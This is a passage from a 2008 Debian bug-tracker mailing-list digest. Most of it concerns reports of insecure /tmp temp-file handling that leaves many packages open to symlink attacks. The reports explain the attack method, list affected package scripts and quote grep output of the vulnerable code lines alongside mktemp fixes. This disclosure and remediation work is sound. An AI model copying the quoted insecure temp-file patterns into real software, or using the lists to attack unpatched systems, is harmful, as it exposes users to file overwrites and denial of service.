Bug#496678: nautilus: Fails to start
Bug marked as found in version 2.4.13-11+b1.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#493883: marked as done ([manpages-it] Uninstallable due to overwrite try of /usr/share/man/it/man1/hman.1.gz)

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 11:17:03 +
with message-id [EMAIL PROTECTED]
and subject line Bug#493883: fixed in man-pages-it 2.80-3
has caused the Debian Bug report #493883,
regarding [manpages-it] Uninstallable due to overwrite try of 
/usr/share/man/it/man1/hman.1.gz
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
493883: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=493883
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: manpages-it
Version: 0.3.4-5
Severity: serious

manpages-it is not installable because tries to overwrite file
/usr/share/man/it/man1/hman.1.gz, also provided by package man2html. I
don't know whether this issue must be solved by manpages-it or
man2html. Setting the severity as serious because I can't install the
package.

Thank you, Giovanni.

# LANG=C apt-get install manpages-it
Reading package lists... Done
Building dependency tree   
Reading state information... Done
The following packages will be upgraded:
  manpages-it
1 upgraded, 0 newly installed, 0 to remove and 1 not upgraded.
Need to get 0B/499kB of archives.
After this operation, 914kB disk space will be freed.
(Reading database ... 343588 files and directories currently installed.)
Preparing to replace manpages-it 0.3.4-5 (using .../manpages-it_2.80-1_all.deb) 
...
Unpacking replacement manpages-it ...
dpkg: error processing /var/cache/apt/archives/manpages-it_2.80-1_all.deb 
(--unpack):
 trying to overwrite `/usr/share/man/it/man1/hman.1.gz', which is also in 
package man2html
dpkg-deb: subprocess paste killed by signal (Broken pipe)
Processing triggers for man-db ...
Errors were encountered while processing:
 /var/cache/apt/archives/manpages-it_2.80-1_all.deb
E: Sub-process /usr/bin/dpkg returned an error code (1)

--- System information. ---
Architecture: i386
Kernel:   Linux 2.6.25-2-686

Debian Release: lenny/sid
  500 unstablewww.debian-multimedia.org 
  500 unstableftp.it.debian.org 
  500 testing security.debian.org 
  500 testing ftp.it.debian.org 
  500 stable  security.debian.org 
  500 stable  ftp.it.debian.org 
-- 
Giovanni Mascellani [EMAIL PROTECTED]
Pisa, Italy

Web: http://giomasce.altervista.org
SIP: [EMAIL PROTECTED]
Jabber: [EMAIL PROTECTED] / [EMAIL PROTECTED]
GPG: 0x5F1FBF70 (FP: 1EB6 3D43 E201 4DDF 67BD  003F FCB0 BB5C 5F1F BF70)


signature.asc
Description: Questa è una parte del messaggio	firmata digitalmente
---End Message---
---BeginMessage---
Source: man-pages-it
Source-Version: 2.80-3

We believe that the bug you reported is fixed in the latest version of
man-pages-it, which is due to be installed in the Debian FTP archive:

man-pages-it_2.80-3.diff.gz
  to pool/main/m/man-pages-it/man-pages-it_2.80-3.diff.gz
man-pages-it_2.80-3.dsc
  to pool/main/m/man-pages-it/man-pages-it_2.80-3.dsc
manpages-it_2.80-3_all.deb
  to pool/main/m/man-pages-it/manpages-it_2.80-3_all.deb



A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to [EMAIL PROTECTED],
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Francesco Paolo Lovergine [EMAIL PROTECTED] (supplier of updated man-pages-it 
package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [EMAIL PROTECTED])


-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

Format: 1.8
Date: Wed, 27 Aug 2008 12:56:34 +0200
Source: man-pages-it
Binary: manpages-it
Architecture: source all
Version: 2.80-3
Distribution: unstable
Urgency: low
Maintainer: Francesco Paolo Lovergine [EMAIL PROTECTED]
Changed-By: Francesco Paolo Lovergine [EMAIL PROTECTED]
Description: 
 manpages-it - Italian version of the manual pages
Closes: 493883
Changes: 
 man-pages-it (2.80-3) unstable; urgency=low
 .
   * Removed duplicated man2html.1
 (closes: #493883)
Checksums-Sha1: 
 564e76fdc208ae3594f387cef8030d8bf5b93d0b 1046 man-pages-it_2.80-3.dsc
 469a8f510195f29079db933c164f5b8cd3f14a0a 4268 man-pages-it_2.80-3.diff.gz
 49ca846a46a5b158515fdbd9eba613490d3049ee 496158 manpages-it_2.80-3_all.deb
Checksums-Sha256: 
 ba2c1a614363a76e716f6df610446871aaf8313e4b55896cc3eab01745cbaddb 1046 
man-pages-it_2.80-3.dsc
 c00f0dc137ec1eb1eab1b4fc1166a49cb7d37a6b96af0778ab0a7390d3ad5d2a 4268 
man-pages-it_2.80-3.diff.gz
 0664b7925558ecbbd92b0f215f1e8b48ec0c73a072c68755ba3acda72e8c6473 496158 
manpages-it_2.80-3_all.deb

Bug#471404: Wouldn't a 32bit bin86 be usefull?

2008-08-27 Thread Goswin von Brederlow
Hi,

wouldn't it make sense to compile bin86 with -m32 on amd64? People
might still want to build 16bit code for example for a boot loader.

MfG
Goswin



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#332782: Release Notes: license clarification

2008-08-27 Thread Osamu Aoki
On Tue, Aug 26, 2008 at 09:58:25PM +0200, Josip Rodin wrote:
 On Tue, Aug 26, 2008 at 07:26:38PM +0200, Luk Claes wrote:
   But, in such an (unlikely) court battle the onus would be on them to
   prove that the stuff they committed was both copyrightable in the first
   place as well as not infringing on previous work (which they apparently
   didn't have any license to modify).
 
  Nope, without a license the contributor could ask for compensation per
  copy that was distributed if the court would agree that he has copyright
  on it and we didn't have permission to distribute it (which is not far
  fetched at all without having a license...).
 
 As I said above... they could hardly claim copyright on modifications which
 they made without a license.

Also, there is no direct damadge made to the contributor too.

Compensation is for something they have fair claim.
 



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: newsbeuter installability

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # libmrss0 is not installable; can be fixed by rebuild from source
 severity 496774 serious
Bug#496774: libmrss0: depends on a nonexistent package
Severity set to `serious' from `normal'

 # newsbeuter has been built against the problematic libmrss0
 severity 496772 serious
Bug#496772: newsbeuter: depends on a nonexistent package
Severity set to `serious' from `normal'

 block 496772 by 496774
Bug#496774: libmrss0: depends on a nonexistent package
Bug#496772: newsbeuter: depends on a nonexistent package
Was not blocked by any bugs.
Blocking bugs of 496772 added: 496774

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496363: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Thijs Kinkhorst
Hi Dirk,

On Monday 25 August 2008 13:57, Dirk Eddelbuettel wrote:
 Upstream covers more than just Linux distros: Aix, Solaris, OS X, HP-UX,
 ... and even Windoze (though the javareconf script may not matter there).

 But I just emailed the point person for javareconf. Maybe we can move
 creation of the temp.dir into a helper function which use mktemp if present
 and default to what it currently does.

 New version with patched javareconf now uploaded.

I see an upload of r-base-core but not (yet) of r-base-core-ra, is that 
intentional?


cheers,
Thijs


pgpBLU1b6TBVn.pgp
Description: PGP signature


Processed: confirmed, let's remove it instead

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 496437 confirmed
Bug#496437: The possibility of attack with the help of symlinks in some Debian 
packages
Tags were: security
Tags added: confirmed

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496437: confirmed, let's remove it instead

2008-08-27 Thread Thijs Kinkhorst
tags 496437 confirmed
thanks

I confirmed that the package is full of insecure temp files. However given 
that it's orphaned and has several problems, I'm asking for removal from 
unstable.


Thijs


pgp3m15STSoXo.pgp
Description: PGP signature


Bug#496357: opensync-plugin-palm: Impossible to install the package

2008-08-27 Thread Michael Banck
On Sun, Aug 24, 2008 at 08:04:44PM +0200, nb wrote:
 When I try to install the package, I have the following error :
 
 Package: opensync-plugin-palm
[...]

Sorry, but that's no error, that's the apt-cache output.  Can you please
post the error you get?


thanks,

Michael



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496363: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Dirk Eddelbuettel

Hi Thijs,

On 27 August 2008 at 13:57, Thijs Kinkhorst wrote:
| Hi Dirk,
| 
| On Monday 25 August 2008 13:57, Dirk Eddelbuettel wrote:
|  Upstream covers more than just Linux distros: Aix, Solaris, OS X, HP-UX,
|  ... and even Windoze (though the javareconf script may not matter there).
| 
|  But I just emailed the point person for javareconf. Maybe we can move
|  creation of the temp.dir into a helper function which use mktemp if present
|  and default to what it currently does.
| 
|  New version with patched javareconf now uploaded.
| 
| I see an upload of r-base-core but not (yet) of r-base-core-ra, is that 
| intentional?

It was. R 2.7.2 came out on Monday, so r-base-core was a natural candidate.

Yesterday I worked on the RC bug requiring GSL docs to go to non-free for
dfsg / gfdl reasons.  So for r-base-core-ra, a build will follow shortly.

There will be a new release too (corresponding to R 2.7.2), but as we don't
know when I'll just preempt it with a new build with a patched javareconf.

Hth, Dirk

-- 
Three out of two people have difficulties with fractions.



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: confirmed to be present

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 496427 confirmed
Bug#496427: The possibility of attack with the help of symlinks in some Debian 
packages
Tags were: security
Tags added: confirmed

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496427: confirmed to be present

2008-08-27 Thread Thijs Kinkhorst
tags 496427 confirmed
thanks

Indeed present, a simple grep yields a number of different results already, 
see below. As the code contains many instances of different things written 
to /tmp, it may make sense to resolve that by creating one private working 
dir securely, and then prefixing that path to all uses of /tmp.


Thijs

./lmbench-3.0-a7/src/bench.h:97:#define UNIX_CONTROL/tmp/lmbench.ctl
./lmbench-3.0-a7/src/bench.h:98:#define UNIX_DATA   /tmp/lmbench.data
./lmbench-3.0-a7/src/bench.h:99:#define UNIX_LAT/tmp/lmbench.lat
./lmbench-3.0-a7/src/rhttp.c:81:
sprintf(name, /tmp/rhttp%d, i);
./lmbench-3.0-a7/src/rhttp.c:96:system(cat /tmp/rhttp*; 
rm /tmp/rhttp*);
./lmbench-3.0-a7/src/rhttp.c:106:   sprintf(buf, /tmp/http%d, 
i);
./lmbench-3.0-a7/src/lat_fcntl.c:105:   
sprintf(state-filename1, /tmp/lmbench-fcntl%d.1, getpid());
./lmbench-3.0-a7/src/lat_fcntl.c:106:   
sprintf(state-filename2, /tmp/lmbench-fcntl%d.2, getpid());
./lmbench-3.0-a7/src/lat_unix_connect.c:18:#define CONNAME /tmp/af_unix
./lmbench-3.0-a7/src/lat_fifo.c:15:#define  F1  /tmp/lmbench_f1.%d
./lmbench-3.0-a7/src/lat_fifo.c:16:#define  F2  /tmp/lmbench_f2.%d
./lmbench-3.0-a7/src/lat_proc.c:20:#define  PROG /tmp/hello-s
./lmbench-3.0-a7/src/lat_proc.c:23:#define  PROG /tmp/hello
./lmbench-3.0-a7/src/lmhttp.c:23:#define
LOGFILE /usr/tmp/lmhttp.log
./lmbench-3.0-a7/scripts/SHIT:594:  system co -q -p -kkvl 
$rev $_[$i]  /tmp/sdiff.$$ .
./lmbench-3.0-a7/scripts/SHIT:595:   
$diff /tmp/sdiff.$$ $working[$i];
./lmbench-3.0-a7/scripts/SHIT:597:  unlink(/tmp/sdiff.
$$);./lmbench-3.0-a7/scripts/rccs:603:  
system co -q -p -kkvl $rev $_[$i]  /tmp/sdiff.$$ .
./lmbench-3.0-a7/scripts/rccs:604:   
$diff /tmp/sdiff.$$ $working[$i];
./lmbench-3.0-a7/scripts/rccs:606:  unlink(/tmp/sdiff.
$$);




pgpVOL44hMGMk.pgp
Description: PGP signature


Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Patrick Winnertz
Hello Dmitry,
Thanks for your test, but atm I've some problems to fix this issue for lustre-
tests
 In some packages I've discovered scripts with errors which may be used
 by a user for damaging important system files or user's files.

 For example if a script uses in its work a temp file which is  created
 in /tmp directory, then every user can create symlink  with  the  same
 name in this directory in order to  destroy  or  rewrite  some  system
 or user file.  Symlink attack may also  lead  not  only  to  the  data
 desctruction but to denial of service as well.
Btw: lustre-tests is a package which contains only binaries for debugging 
lustre, and is therefore only needed on very very few systems. 

But nevertheless this should be fixed. 

I guess the part which is critical is this one:
---snip--
while date; do
LOOP=`expr $LOOP + 1`
echo Test #$LOOP
iozone $VERIFY $ODIR -r $REC -i 0 -i 1 -f $FILE -s $SIZE 21 || exit $?
[ -f endiozone -o $LOOP -ge $COUNT ]  rm -f endiozone  exit 0
done | tee /tmp/iozone.log
snap

This small script creates a log of the iozone run in /tmp without checking if 
this file exists there.  Do you have any hints how to fix this issue? 

Greetings
Winnie




signature.asc
Description: This is a digitally signed message part.


Bug#496433: this is indeed present

2008-08-27 Thread Thijs Kinkhorst
tags 496433 confirmed
thanks

Hi,

Indeed, several times the file /tmp/audiolink.db.tmp gets used in 
code/audiolink. This is probably easily fixable through using the Perl::Temp 
module and its mktemp() funtion to create a secure file once, (re)use that on 
the several needed occasions and remove it after.


cheers,
Thijs


pgpzxziwnumS3.pgp
Description: PGP signature


Bug#481134: Please hint poppler-data for lenny inclusion

2008-08-27 Thread Hideki Yamane
On Sun, 24 Aug 2008 08:32:21 +0200
Christian Perrier [EMAIL PROTECTED] wrote:
 Also don't forget about suggesting to add it to the CJK languages
 -desktop tasks in tasksel, if it is that important.
 
 I think that non-free packages can be added there...

 That's very very helpful for our users!

 If not, users must edit their apt lines by hand, and know this
 poppler-data package is needed to view PDF files, it's painful
 thing for average users (Yes, I can do that easily, and you can
 also do that, but your mother, father, little brother or sister
 probably can't do that).

 Our priorities are our users and free software - yeah, you know that, 
 users are important for us :) (not only free software)

 
 So I and other Japanese Debian developer/maintainer/package maintainer/
 users want poppler-data package to there, the CJK languages-desktop 
 tasks in tasksel. Please consider that.

 



-- 
Regards,

 Hideki Yamane henrich @ debian.or.jp/iijmio-mail.jp
 http://wiki.debian.org/HidekiYamane



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: this is indeed present

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 496433 confirmed
Bug#496433: The possibility of attack with the help of symlinks in some Debian 
packages
Tags were: security
Tags added: confirmed

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496419: issue is present, code runs as root

2008-08-27 Thread Thijs Kinkhorst
tags 496419 confirmed
thanks

Hi,

A simple grep revealed a lot of tempfile issues here, see below. As far as I 
understand it, the code runs as root. This makes the issue quite serious. 
Please make sure this is fixed before lenny is released.

As several different temp files are used insecurely, it may be better to 
create a separate, private working directory for the program where it may 
store all those files at will.


cheers,
Thijs

./config-scripts/xen-3.2/configure-xend.sh:cat  EOF  /tmp/open_ssl.res
./config-scripts/xen-3.2/configure-xend.sh:$OPENSSL req -new -key 
$KEY -out $CSR  /tmp/open_ssl.res
./config-scripts/xen-3.2/configure-xend.sh:rm /tmp/open_ssl.res
./config-scripts/xen-3.1/configure-xend.sh:cat  EOF  /tmp/open_ssl.res
./config-scripts/xen-3.1/configure-xend.sh:$OPENSSL req -new -key 
$KEY -out $CSR  /tmp/open_ssl.res
./config-scripts/xen-3.1/configure-xend.sh:rm /tmp/open_ssl.res
./src/utils.py:updates_file = /tmp/updates.xml
./src/utils.py:  
dir=/tmp)
./src/utils.py:TEST_CONFIGFILE = '/tmp/convirt.conf'
./src/XenNode.py:dom_config.save(/tmp/test_config)
./src/XenNode.py:newcfg.set_filename(/tmp/Txx)
./src/XenNode.py:f = managed_node.node_proxy.open(/tmp/Txx)
./src/XenNode.py:print ### read config from /etc/xen/auto and write them 
to /tmp
./src/XenNode.py:d.save(/tmp/ + f)
./src/NodeProxy.py:node.put(/tmp/send, /tmp/send_r)
./src/NodeProxy.py:node.get(/tmp/send_r, /tmp/received)
./src/NodeProxy.py:fd = node.open('/tmp/test_writable','w')
./src/NodeProxy.py:
print 'exists?: ',node.file_exists('/tmp/test_writable')
./src/NodeProxy.py:print 'isWritable?: ', 
node.file_is_writable('/tmp/test_writable')
./src/NodeProxy.py:node.remove('/tmp/test_writable')
./src/NodeProxy.py:print 'exists?: ', 
node.file_exists('/tmp/test_writable')
./src/NodeProxy.py:node.mkdir(/tmp/node_test)
./src/NodeProxy.py:w = node.open(/tmp/node_test/test, w)
./src/NodeProxy.py:r = node.open(/tmp/node_test/test)
./src/NodeProxy.py:node.remove(/tmp/node_test/test)
./src/NodeProxy.py:node.rmdir(/tmp/node_test)
./src/NodeProxy.py:output,code = node.exec_cmd('find /tmp')
./src/NodeProxy.py:output,code = node.exec_cmd('junk /tmp')
./src/GridManager.py:  
dir=/tmp)
./src/KVMProxy.py:cmdline = cmdline +  -monitor unix:/tmp/ + 
config.get(name) + \
./src/KVMProxy.py:config[monitor] = unix:/tmp/xyz


pgpOUGC4hsyzQ.pgp
Description: PGP signature


Processed: issue is present, code runs as root

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 tags 496419 confirmed
Bug#496419: The possibility of attack with the help of symlinks in some Debian 
packages
Tags were: security
Tags added: confirmed

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#481134: Please hint poppler-data for lenny inclusion

2008-08-27 Thread Hideki Yamane
On Sun, 24 Aug 2008 19:45:13 +0200
Luk Claes [EMAIL PROTECTED] wrote:
 unblocked

 Great thanks Luk!
 But, verrry sooorry, I've updated this poppler-data package before
 read this mail... 

 changelog is below, 1 bug fix and trivial changes.

 poppler-data (0.2.0-2) unstable; urgency=low
 
   * debian/control
 - add DM-Upload-Allowed: yes, because I'm DM :)
 - fix poppler-data should suggest libpoppler3 (Closes: #496268)
 - change Priority: optional from extra, same as cmap-adobe-*
 - add some descriptions for cmap-adobe-* users

 so, please unblock this again, please...
 I am terribly sorry about the inconvenience.

-- 
Regards,

 Hideki Yamane henrich @ debian.or.jp/iijmio-mail.jp
 http://wiki.debian.org/HidekiYamane



-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496582: gnome-app-install: Application hangs while searching for a package

2008-08-27 Thread Julian Andres Klode
reassign 496582 librsvg2-2 2.22.2-2
severity 496582 important

Am Mittwoch, den 27.08.2008, 00:13 +0200 schrieb Jose Pablo Ferrero:
 The problem occurs when showing some icons (i.e. elisa.svg). Trying to
 open elisa.svg (/usr/share/app-install/icons/) with gpaint or gimp cause
 a segmentation fault, but with epiphany, iceweasel or svgdisplay there
 isn't any problem. I'm not sure where the problem could be, but because
 this is not a gnome-install-app bug, please close it.
This seems to be a bug in librsvg. Many applications crash with this
file, including eog and rsvg-view.
 
 
 
 
 


signature.asc
Description: Dies ist ein digital signierter Nachrichtenteil


Processed (with 5 errors): Re: Bug#496582: gnome-app-install: Application hangs while searching for a package

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 reassign 496582 librsvg2-2 2.22.2-2
Bug#496582: gnome-app-install: Application hangs while searching for a package
Bug reassigned from package `gnome-app-install' to `librsvg2-2'.

 severity 496582 important
Bug#496582: gnome-app-install: Application hangs while searching for a package
Severity set to `important' from `grave'

 Am Mittwoch, den 27.08.2008, 00:13 +0200 schrieb Jose Pablo Ferrero:
Unknown command or malformed arguments to command.

  The problem occurs when showing some icons (i.e. elisa.svg). Trying to
Unknown command or malformed arguments to command.

  open elisa.svg (/usr/share/app-install/icons/) with gpaint or gimp cause
Unknown command or malformed arguments to command.

  a segmentation fault, but with epiphany, iceweasel or svgdisplay there
Unknown command or malformed arguments to command.

  isn't any problem. I'm not sure where the problem could be, but because
Unknown command or malformed arguments to command.

Too many unknown commands, stopping here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Processed: retitle 494468 to Postinst violates Debian policy (10.7.3) by not preserving changes to /etc/locale.gen

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 # Automatically generated email from bts, devscripts version 2.10.33
 retitle 494468 Postinst violates Debian policy (10.7.3) by not preserving 
 changes to /etc/locale.gen
Bug#494468: locales: Postist violates Debian policy (10.7.3) by not preserving 
changes to /etc/locale.gen
Changed Bug title to `Postinst violates Debian policy (10.7.3) by not 
preserving changes to /etc/locale.gen' from `locales: Postist violates Debian 
policy (10.7.3) by not preserving changes to /etc/locale.gen'.


End of message, stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Stephen Gran
This one time, at band camp, Patrick Winnertz said:
 I guess the part which is critical is this one:

tmpfile=$(mktemp /tmp/iozone.XX)
 ---snip--
 while date; do
   LOOP=`expr $LOOP + 1`
   echo Test #$LOOP
   iozone $VERIFY $ODIR -r $REC -i 0 -i 1 -f $FILE -s $SIZE 21 || exit $?
   [ -f endiozone -o $LOOP -ge $COUNT ]  rm -f endiozone  exit 0
 snap
done | tee $tmpfile
-- 
 -
|   ,''`.Stephen Gran |
|  : :' :[EMAIL PROTECTED] |
|  `. `'Debian user, admin, and developer |
|`- http://www.debian.org |
 -


signature.asc
Description: Digital signature


Bug#496363: marked as done (The possibility of attack with the help of symlinks in some Debian packages)

2008-08-27 Thread Debian Bug Tracking System

Your message dated Wed, 27 Aug 2008 13:02:13 +
with message-id [EMAIL PROTECTED]
and subject line Bug#496363: fixed in r-base-core-ra 1.1.1-2
has caused the Debian Bug report #496363,
regarding The possibility of attack with the help of symlinks in some Debian 
packages
to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [EMAIL PROTECTED]
immediately.)


-- 
496363: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=496363
Debian Bug Tracking System
Contact [EMAIL PROTECTED] with problems
---BeginMessage---
Package: r-base-core-ra
Severity: grave

Hi, maintainer!

This message about the error concerns a few packages  at  once.   I've
tested all the packages (for Lenny) on my Debian mirror.  All  scripts
of packages (marked as executable) were tested.

In some packages I've discovered scripts with errors which may be used
by a user for damaging important system files or user's files.

For example if a script uses in its work a temp file which is  created
in /tmp directory, then every user can create symlink  with  the  same
name in this directory in order to  destroy  or  rewrite  some  system
or user file.  Symlink attack may also  lead  not  only  to  the  data
desctruction but to denial of service as well.

Even if you create files or directories with help of function 'RANDOM'
or pid(), then your system is not protected. Attacker can create many
symlinks in order to destroy your data or create 'denial  of  service'
for your package scripts.

Even if you make rm(dir) for files/directories, then  your  system  is
not protected. Attacker can permanently create symlinks.

This list is created with the help of script.  This list is sorted  by
hand. Howewer in some cases mistake is possible.

Please, Be understanding to possible mistakes. :)

I set Severity into grave for this bug. The table of discovered
problems is below.

Discussion of this bug you can see in debian-devel@:
http://lists.debian.org/debian-devel/2008/08/msg00271.html

Binary-package: r-base-core-ra (1.1.1-1)
file: /usr/lib/Ra/lib/R/bin/javareconf
Binary-package: rccp (0.9-2)
file: /usr/lib/rccp/delqueueask
Binary-package: mafft (6.240-1)
file: /usr/bin/mafft-homologs
Binary-package: openoffice.org-common (1:2.4.1-6)
file: /usr/lib/openoffice/program/senddoc
Binary-package: crossfire-maps (1.11.0-1)
file: /usr/share/games/crossfire/maps/Info/combine.pl
Binary-package: sgml2x (1.0.0-11.1)
file: /usr/bin/rlatex
Binary-package: liguidsoap (0.3.6-4)
file: /var/lib/liguidsoap/liguidsoap.py
Binary-package: citadel-server (7.37-1)
file: /usr/lib/citadel-server/migrate_aliases.sh
Binary-package: ampache (3.4.1-1)
file: /usr/share/ampache/www/locale/base/gather-messages.sh
Binary-package: xen-utils-3.2-1 (3.2.1-2)
file: /usr/lib/xen-3.2-1/bin/qemu-dm.debug
Binary-package: dtc-common (0.29.6-1)
file: /usr/share/dtc/admin/accesslog.php
file: /usr/share/dtc/admin/sa-wrapper
Binary-package: honeyd-common (1.5c-3)
file: /usr/share/honeyd/scripts/test.sh
Binary-package: lustre-tests (1.6.5-1)
file: /usr/lib/lustre/tests/runiozone
Binary-package: linuxtrade (3.65-8+b4)
file: /usr/share/linuxtrade/bin/linuxtrade.bwkvol
file: /usr/share/linuxtrade/bin/linuxtrade.wn
file: /usr/share/linuxtrade/bin/moneyam.helper
Binary-package: freevo (1.8.1-0)
file: /usr/bin/freevo.real
Binary-package: fml (4.0.3.dfsg-2)
file: /usr/share/fml/libexec/mead.pl
Binary-package: rkhunter (1.3.2-3)
file: /usr/bin/rkhunter
Binary-package: openswan (1:2.4.12+dfsg-1.1)
file: /usr/lib/ipsec/livetest
Binary-package: linux-patch-openswan (1:2.4.12+dfsg-1.1)
file: /usr/src/kernel-patches/all/openswan/packaging/utils/maysnap
file: /usr/src/kernel-patches/all/openswan/packaging/utils/maytest
Binary-package: aptoncd (0.1-1.1)
file: /usr/share/aptoncd/xmlfile.py
Binary-package: cdcontrol (1.90-1.1)
file: /usr/lib/cdcontrol/writtercontrol
Binary-package: newsgate (1.6-23)
file: /usr/bin/mkmailpost
Binary-package: gpsdrive-scripts (2.10~pre4-3)
file: /usr/bin/geo-code
Binary-package: impose+ (0.2-11)
file: /usr/bin/impose
Binary-package: mgt (2.31-5)
file: /usr/games/mailgo
Binary-package: audiolink (0.05-1)
file: /usr/bin/audiolink
Binary-package: ibackup (2.27-4.1)
file: /usr/bin/ibackup
Binary-package: emacspeak (26.0-3)
file: /usr/share/emacs/site-lisp/emacspeak/etc/extract-table.pl
Binary-package: bk2site (1:1.1.9-3.1)
file: /usr/lib/cgi-bin/bk2site/redirect.pl
Binary-package: datafreedom-perl (0.1.7-1)
file: /usr/bin/dfxml-invoice
Binary-package: emacs-jabber (0.7.91-1)
file: 

Bug#496371: [Pkg-lustre-maintainers] Bug#496371: The possibility of attack with the help of symlinks in some Debian packages

2008-08-27 Thread Dmitry E. Oboukhov
SG tmpfile=$(mktemp /tmp/iozone.XX)

use 'mktemp -t iozone.XX' instead 'mktemp /tmp/iozone.XX'
--
... mpd paused: Manowar - Gloves of Metal

. ''`. Dmitry E. Oboukhov
: :’  : [EMAIL PROTECTED]
`. `~’ GPGKey: 1024D / F8E26537 2006-11-21
  `- 1B23 D4F8 8EC0 D902 0555  E438 AB8C 00CF F8E2 6537


signature.asc
Description: Digital signature


Processed: your mail

2008-08-27 Thread Debian Bug Tracking System
Processing commands for [EMAIL PROTECTED]:

 forwarded 496414 http://bugzilla.scilab.org/show_bug.cgi?id=3409
Bug#496414: The possibility of attack with the help of symlinks in some Debian 
packages
Noted your statement that Bug has been forwarded to 
http://bugzilla.scilab.org/show_bug.cgi?id=3409.

 thanks
Stopping processing here.

Please contact me if you need assistance.

Debian bug tracking system administrator
(administrator, Debian Bugs database)


-- 
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of unsubscribe. Trouble? Contact [EMAIL PROTECTED]



Bug#483337: intent to NMU

2008-08-27 Thread Nico Golde
Hi,
a patch to fix this is attached and archived on:
http://people.debian.org/~nion/nmu-diff/mt-daapd-0.9~r1696-1.3_0.9~r1696-1.4.patch

Kind regards
Nico

-- 
Nico Golde - http://www.ngolde.de - [EMAIL PROTECTED] - GPG: 0x73647CFF
For security reasons, all text in this mail is double-rot13 encrypted.
diff -u mt-daapd-0.9~r1696/debian/changelog mt-daapd-0.9~r1696/debian/changelog
--- mt-daapd-0.9~r1696/debian/changelog
+++ mt-daapd-0.9~r1696/debian/changelog
@@ -1,3 +1,11 @@
+mt-daapd (0.9~r1696-1.4) unstable; urgency=low
+
+  * Fix authentication upstream patch checking for a wrong return value
+(03_fix-authentication.dpatch; Closes: #496217).
+  * Fix taglib api calls (04_taglib_api_calls.dpatch; Closes: #483337)
